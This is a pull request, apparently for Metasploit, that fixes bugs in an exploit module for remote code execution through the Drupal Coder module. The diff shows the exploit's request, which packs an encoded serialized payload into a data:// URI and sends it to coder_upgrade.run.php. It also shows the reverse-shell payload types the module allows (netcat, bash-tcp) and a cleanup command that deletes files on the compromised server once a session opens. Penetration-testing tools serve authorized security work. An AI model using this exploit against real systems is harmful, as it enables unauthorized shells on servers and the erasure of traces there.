### PR TITLE
Fix drupal_coder_exec bugs

### DIFF
--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -98,4 +98,12 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
   end
+
+  # XXX: FileDropper can't handle weird filenames
+  def on_new_session(session)
+    # This find command should be decently portable...
+    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
+    print_status("Cleaning up: #{command}")
+    session.shell_command_token(command)
+  end
 end

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Compat'      =>
             {
               'PayloadType' => 'cmd cmd_bash',
-              'RequiredCmd' => 'netcat netcat-e bash-tcp'
+              'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
             },
         },
       'Platform'       => ['unix'],

--- a/modules/exploits/unix/webapp/drupal_coder_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_coder_exec.rb
@@ -87,14 +87,14 @@ class MetasploitModule < Msf::Exploit::Remote
     p << payload.encoded
     p << ' #";s:4:"name";s:4:"test";}}}'
 
-    payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
+    pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
 
     send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
       'encode_params' => false,
       'vars_get' => {
-        'file' => payload
+        'file' => pl
       }
     )
   end


### PR DESCRIPTION
Fixes some things missed in #7115. My bad for not catching these before merging.
- [x] Test the `cmd/unix/generic` payload
- [x] Make sure `payload` isn't overwritten
- [x] Make sure the module cleans up after itself

cc @mmetince
